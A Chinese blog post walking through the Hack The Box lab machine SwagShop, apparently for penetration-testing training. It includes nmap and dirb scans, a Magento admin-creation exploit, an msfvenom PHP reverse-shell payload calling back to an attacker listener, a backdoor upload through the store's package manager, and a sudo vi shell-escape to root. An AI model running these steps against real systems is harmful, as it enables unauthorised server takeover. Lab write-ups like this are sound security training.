美文网首页web渗透测试
HTB靶机系列-SwagShop

HTB靶机系列-SwagShop

作者: 蚁景科技 | 来源:发表于2019-07-17 10:32 被阅读12次

(一)介绍

今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的linux系统的靶机,所以主要是对枚举,信息收集等手段的考察。对OSCP感兴趣的同学也可以去试着去HTB上找些靶机做做看。

(二)信息收集

对目标进行一个初步的扫描。nmap -T4 -sC -sV10.10.10.140 发现只对22端口以及80端口进行了开放。

顺便对其进行目录遍历,我们发现一个有意思的目录,这个有用,后面再说。dirbhttp://10.10.10.140 /usr/share/dirb/wordlists/common.txt

我们打开网站,通过火狐的插件Wappalyzer,或者网页logo就可以发现是个开源的电子商务网站。

(三)漏洞利用

通过searchsploit搜索发现漏洞还是挺多的。

我们发现一个RCE漏洞吸引了我们的注意力,所以我们选择37977的漏洞试试,把expcp到我们的目录,发现这个脚本可以创建一个admin权限的账户。但是我们需要改变一下里面的内容,target为我们的目标ip:http://10.10.10.140/index.php,并且删除一些不必要的注释。

参考地址:http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/

此时运行我们的exp

显示我们的exp运行了,但是这个后台地址是不对的,这就要用到刚刚我们扫到的地址了,http://10.10.10.140/downloader/这个地址也可以直接用exp添加的账户进行登陆

我们成功登陆了后台,之后我们可以用在google找到的后门项目进行备份还原来拿shell,

https://github.com/P34C3-07/LavaMagentoBD

我们可以用msf来生成一个php后门,

msfvenom -pphp/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=4444 -f raw >shell.php

之后在压缩包放置你的shell,这里我的路径是

/app/code/community/Lavalamp/Connector/IndexController.php

用Directpackage file upload功能进行上传

上传成功.接下来msf进行监听,成功返回shell。

我们可以在/home/haris找到第一个user.txt

(四)提权

接下来我们要进行提权,sudo-l看一下,发现可以不用密码就以root权限执行vi。

我们可以去/var/www/html/目录下创建一个文件,利用vi的-c参数进行提权,我们利用这条指令即可提权,如图显示提权成功,获取到root.txt

sudo   vi  /var/www/html/111  -c  '!sh'

(五)相关实验

VulnHub渗透测试实战Vulnhub是一个面向公众开放的靶机平台,主旨是让任何人获得信息安全相关的实战经验。里面有很多设计好的练习靶机镜像,每个镜像有一个或多个flag。

长按下面二维码,或点击 合天网安实验室,可预览学习(PC端操作最佳哟)

长按开始学习

相关文章

  • HTB靶机系列-SwagShop

    (一)介绍 今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的l...

  • hackthebox-Dyplesher

    Dyplesher靶机是自己第一次完成的现役insane难度htb靶机。靶机涉及的服务相对比较多,包括web,go...

  • Bank(Clear Text Credentials,SUID

    开放端口 详细端口信息 DNS 首先按照htb的习惯,我们假定靶机的域名是bank.htb,依此执行Zone Tr...

  • hackthebox-Sniper--初尝windows靶机

    好久没做htb的靶机,这次又跟着着大佬的思路去做了一台新的靶机。不同以往的是,这次的靶机Sniper是window...

  • HTB靶机渗透

    信息收集 这里可以先设置一下hosts文件 扫描端口发现开放了 8080 的web端口 页面提示有一个源码泄露 那...

  • 【HTB】SwagShop(sql注入,sudo滥用:vi)

    免责声明 本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任...

  • 【网络安全】HTB靶机渗透系列之Sniper

    介绍 Sniper是一个中等难度的靶机,知识点涉及本地文件包含利用、远程文件包含利用、凭证制作、恶意chm文件利用...

  • hackthebox-SneakyMailer

    SneakyMailer是自己在htb上完成的第30台靶机。因为特殊纪念意义加上涉及到一些很有意思的知识所以记录下...

  • hackthebox-Fatty-JavaExploits

    Faaty 是htb这周刚退役的靶机。本来一周前自己打算下手试试的,不过做了一会发现因为即将退役就干脆搁置等ipp...

  • WebLogic远程命令执行

    靶机说明 目标ip:172.16.53.28(window 2003) 本靶机所针对的序列化漏洞系列以及常见安全问...

网友评论

    本文标题:HTB靶机系列-SwagShop

    本文链接:https://www.haomeiwen.com/subject/qxoflctx.html